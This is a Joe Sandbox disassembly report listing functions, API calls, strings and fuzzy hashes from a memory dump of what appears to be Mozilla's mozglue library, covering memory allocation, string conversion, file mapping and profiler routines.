Instruction ID: 26623e33d428d1de23076e9eb8a7092053ef7e326f3cd6bc33a37e5b18b6e371
Opcode Fuzzy Hash: 7107396dcefeaf75a855aaf160fa465836da585b7a25b7b7df6d8c4e6f6f02c2
Instruction Fuzzy Hash: B921E175600615AFDB109F28EC24A9A377AFB5636DF108215F92CD7B81DB31D8078BB1

Function 6C9F8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C9BEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9BEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C9FB392,?,?,00000001), ref: 6C9F91F4

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

Strings

marker-chart, xrefs: 6C9F905E
data, xrefs: 6C9F90E8
name, xrefs: 6C9F8F16
timeline-ipc, xrefs: 6C9F9096
timeline-fileio, xrefs: 6C9F90A4
timeline-overview, xrefs: 6C9F907A
marker-table, xrefs: 6C9F906C
timeline-memory, xrefs: 6C9F9088
stack-chart, xrefs: 6C9F90B2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: e9ca04bf070f6bf3809864f02ef28d6680a1dee73664edc99c4ac12f0474c4f6
Instruction ID: 8c0d160bdf50506f7ddd8ac828b8395858a447931aaf41b20edd46d5f9d3bbcc
Opcode Fuzzy Hash: e9ca04bf070f6bf3809864f02ef28d6680a1dee73664edc99c4ac12f0474c4f6
Instruction Fuzzy Hash: E4B1C3B0B012199BDB04CF99C891BEEBBB9BF95308F144029D516ABF80D735D986CBD1

Function 6C9DC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9DC5A3
WideCharToMultiByte.KERNEL32 ref: 6C9DC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C9DC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9DCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9DCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9DCAA5

Strings

0, xrefs: 6C9DD30A
(null), xrefs: 6C9DC596

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 32642c50d352c3dfbef96bfadb052a467e40a3eb74eeaa5460cdcf8fabd2a7da
Instruction ID: f25218fda092ab2047dd0469528c6d30cf1dc11db2fbf6eb84f209031380999f
Opcode Fuzzy Hash: 32642c50d352c3dfbef96bfadb052a467e40a3eb74eeaa5460cdcf8fabd2a7da
Instruction Fuzzy Hash: 2AA1DF31608B529FDB10DF28C98475ABBF5AF89748F06C91CE88AE3741D735E805CB92

Function 6C9DC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9DC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9DC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C9DC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9DC891

Strings

NAN, xrefs: 6C9DC7AD
nan, xrefs: 6C9DC7A8
INF, xrefs: 6C9DC794
inf, xrefs: 6C9DC78F

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 094803d8fa262665c6f935e985288528e73d1f460a7108d716cc9cf4a3f79c36
Instruction ID: 69f3decff7f550f182def03cabbecfe75deb82b3f52adb82a5ce54e257ed3f29
Opcode Fuzzy Hash: 094803d8fa262665c6f935e985288528e73d1f460a7108d716cc9cf4a3f79c36
Instruction Fuzzy Hash: CD51A571908B808BD704DF6CC58169AFBF4BF9A308F018A1CF9D5A7650E774E985CB42

Function 6C9B4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C9F4843,?), ref: 6C9B45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C9F4843,?), ref: 6C9B468A
free.MOZGLUE(?,?,?,?,?,?,6C9F4843,?), ref: 6C9B46C9
free.MOZGLUE(?), ref: 6C9B46EF
free.MOZGLUE(?), ref: 6C9B4712
free.MOZGLUE(?), ref: 6C9B4735
free.MOZGLUE(?), ref: 6C9B4758
free.MOZGLUE(?), ref: 6C9B477B
free.MOZGLUE(?), ref: 6C9B479E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 50053bd2b8c79c92cfa3bbaae7324377a943e104bee518b5e6697ee8765ebdcc
Instruction ID: 2275d9547fd6bf2f9e449641f2694a7d795d7382345ad1c24091a4b129721701
Opcode Fuzzy Hash: 50053bd2b8c79c92cfa3bbaae7324377a943e104bee518b5e6697ee8765ebdcc
Instruction Fuzzy Hash: 26B1F271A00512AFDB189F2CC8D476E77A6AF52328F18466DE816FBB86D730D840DF91

Function 6CA1AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CA1AC52
CreateFileMappingW.KERNEL32 ref: 6CA1AC7D
GetSystemInfo.KERNEL32 ref: 6CA1AC98
MapViewOfFile.KERNEL32 ref: 6CA1ACB0
GetSystemInfo.KERNEL32 ref: 6CA1ACCD
MapViewOfFile.KERNEL32 ref: 6CA1AD05
UnmapViewOfFile.KERNEL32 ref: 6CA1AD1C
CloseHandle.KERNEL32 ref: 6CA1AD28
UnmapViewOfFile.KERNEL32 ref: 6CA1AD37
CloseHandle.KERNEL32 ref: 6CA1AD43
CloseHandle.KERNEL32 ref: 6CA1AD67

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: a3cd779285a7c5abc8ce3bf710bd229b58d222d123f12e451eb3ae787600288a
Instruction ID: 2732d0d45780b0c15e298151a2d4d7e0c450756c07b20030de7e342f0db3d4ab
Opcode Fuzzy Hash: a3cd779285a7c5abc8ce3bf710bd229b58d222d123f12e451eb3ae787600288a
Instruction Fuzzy Hash: 733197B1904B058FDB04AF7DD94826EBBF1FF85305F118A2DE889C7251EB749489CB82

Function 6C9C9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C9C9675
__Init_thread_footer.LIBCMT ref: 6C9C9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9C96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C9C9707
__Init_thread_footer.LIBCMT ref: 6C9C971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9773

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9C97B7
FreeLibrary.KERNEL32 ref: 6C9C97D0
FreeLibrary.KERNEL32 ref: 6C9C97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9824

Strings

ntdll.dll, xrefs: 6C9C96E3
NtMapViewOfSection, xrefs: 6C9C9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C9C9670
MapViewOfFileNuma2, xrefs: 6C9C97B1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 29b6224faf99d87667ec0e519b6b89c6cc3f68f1da7cea1bcdd868d2da36e845
Instruction ID: 8b1413c11accf566b326a7660486d42c007894b854672463b9600d49dcd4c35d
Opcode Fuzzy Hash: 29b6224faf99d87667ec0e519b6b89c6cc3f68f1da7cea1bcdd868d2da36e845
Instruction Fuzzy Hash: 5F418E717003069BDF14DFA5ECA9A967BB4FB49718F118169ED09C7780E730E816CBA2

Function 6C9B1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1EC1
LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1EE1
EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9B1F38
LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9B1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C9B1F83
LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FC0
EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FE2
LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9B2019

Strings

MOZ_CRASH(), xrefs: 6C9B2000

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 252900ec4981bfe619e45a32bd8ccf39f9ce98fb5e9c47b51d5c29bfb0fa968a
Instruction ID: 343cbf750817b97b598040db43cc2f566b4df8a974d4c3f37408686e16db85ae
Opcode Fuzzy Hash: 252900ec4981bfe619e45a32bd8ccf39f9ce98fb5e9c47b51d5c29bfb0fa968a
Instruction Fuzzy Hash: 5141DE71B0431A9BDB149FA8DCA9B6B3AB5EF5A308F144125F908E7780DB71D805CBD1

Function 6CA00000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6CA00039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA00041
GetCurrentThreadId.KERNEL32 ref: 6CA00075
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6CA00082
moz_xmalloc.MOZGLUE(00000048), ref: 6CA00090
free.MOZGLUE(?), ref: 6CA00104
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6CA0011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CA0005B

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 1f40163adcccfae3c84c24ed247419d5a84a7e420045ae6b2ba4e6abbebabb9b
Instruction ID: 487696dd91a307650701032d84f65fd12cd43d821bc904b952d0557aa5eb4382
Opcode Fuzzy Hash: 1f40163adcccfae3c84c24ed247419d5a84a7e420045ae6b2ba4e6abbebabb9b
Instruction Fuzzy Hash: 7141CDB16017559FCB20CF28DC50A9ABBB1FF69358F04851EE99A83B41D731E846CBA1

Function 6C9C7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9C7EA7
malloc.MOZGLUE(00000001), ref: 6C9C7EB3

Part of subcall function 6C9CCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C9CCB49
Part of subcall function 6C9CCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C9CCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C9C7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C9C7F19
malloc.MOZGLUE(?), ref: 6C9C7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9C7F4D

Strings

d, xrefs: 6C9C7F89

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 94d88c6bad60358e40222348e8f786f42a3023082c094de824070c8cf59a6e1e
Instruction ID: 1edf1b3d0eb6099af6f4c2e855bce89edff132a65aaeb0929ae74fc0a6f987a2
Opcode Fuzzy Hash: 94d88c6bad60358e40222348e8f786f42a3023082c094de824070c8cf59a6e1e
Instruction Fuzzy Hash: B9313B71E0039997EB019B38CC545FEB778EFA6208F049628DC4997612FB34E9C9C392

Function 6C9C3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9C3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C9C4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C4157

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 78eb46c401877f3fbcd881a9c89643c4d523099261aa7b6d063aecba47ff3ac6
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: F0A190B1B40215CFEB40CF28C980669B7B5FF48308F294599D909AF742D771E986CFA2

Function 6C9B2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C9D3F47,?,?,?,6C9D3F47,6C9D1A70,?), ref: 6C9B207F
memset.VCRUNTIME140(?,000000E5,6C9D3F47,?,6C9D3F47,6C9D1A70,?), ref: 6C9B20DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C9D3F47,6C9D1A70,?), ref: 6C9B211A
EnterCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B2145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C9D3F47,6C9D1A70,?), ref: 6C9B21BA
EnterCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B21E0
LeaveCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B2232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C9B2253, 6C9B2268
MOZ_CRASH(), xrefs: 6C9B227D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: ae623f899f9510e59c49c3c08686705e03c162dc1e1fce300ece13b6a44edb1e
Instruction ID: 4c19a8e971812510d51b3cf18433e3454ff357634df40a68299280a64d1605d5
Opcode Fuzzy Hash: ae623f899f9510e59c49c3c08686705e03c162dc1e1fce300ece13b6a44edb1e
Instruction Fuzzy Hash: 1861B231F00A169FCB18CA68CC99B6E76B5EF95318F294239E928F7A94D770DD01C781

Function 6C9B48E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C9F483A,?), ref: 6C9B4ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C9F483A,?), ref: 6C9B4AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C9F483A,?), ref: 6C9B4A82

Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C9F483A,?), ref: 6C9B4A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C9F483A,?), ref: 6C9B4A35

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C9F483A,?), ref: 6C9B4A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C9F483A,?), ref: 6C9B4AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C9F483A,?), ref: 6C9B4B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C9F483A,?), ref: 6C9B4B2C

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: a440eac14169c15a5d8f70f8c117632ce79525fb1e11c2eeff28e7d6c0d40f4e
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: A57149B1A007069FCB54CF68C480AAAB7F5FF18308B104A3EE15ADBB41E731E655DB81

Function 6CA09D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA08273), ref: 6CA09D65
free.MOZGLUE(6CA08273,?), ref: 6CA09D7C
free.MOZGLUE(?,?), ref: 6CA09D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CA09E0F
free.MOZGLUE(6CA0946B,?,?), ref: 6CA09E24
free.MOZGLUE(?,?,?), ref: 6CA09E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CA09EC8
free.MOZGLUE(6CA0946B,?,?,?), ref: 6CA09EDF
free.MOZGLUE(?,?,?,?), ref: 6CA09EF5

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 2309ab9b70df78e0751edd626d0231467b3b3f902375ef43b03f4ca60099a621
Instruction ID: 26ac8dced9b943aa65e20933548fe09efc263660387dc44b55917907dbe08524
Opcode Fuzzy Hash: 2309ab9b70df78e0751edd626d0231467b3b3f902375ef43b03f4ca60099a621
Instruction Fuzzy Hash: 7571AEB0A09B419BD712CF28D58055BF3F4FFA9319B448619E89A5BB01EB30F8C5CB91

Function 6CA0DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CA0DDCF

Part of subcall function 6C9EFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9EFA4B

Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DE0D
free.MOZGLUE(00000000), ref: 6CA0DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DEE9
